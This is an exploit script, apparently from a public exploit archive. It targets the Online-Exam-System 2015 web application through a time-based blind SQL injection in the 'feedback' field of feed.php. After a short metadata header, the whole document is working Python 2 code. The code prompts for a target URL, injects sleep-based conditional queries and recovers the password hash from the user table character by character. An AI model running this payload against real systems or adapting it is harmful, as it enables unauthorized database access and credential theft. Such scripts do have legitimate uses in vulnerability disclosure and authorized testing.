# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://github.com/sunnygkp10/ # Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git # Affected Version: 2015 # Tested on: Ubuntu # CVE : N/A import requests, string, time from sys import stdout URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n") payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^" payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -" so_far = hash = "" while True: for i in string.digits + string.ascii_lowercase: so_far = hash + i payload_to_send = payload + str(so_far) + payload2 data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send} start = time.time() r = requests.post(URL + "feed.php", data = data) request_time = time.time() - start if request_time > 5: hash += i stdout.write(i) stdout.flush() break if len(hash) > 31: stdout.write("\n") print "Hash found: " + hash break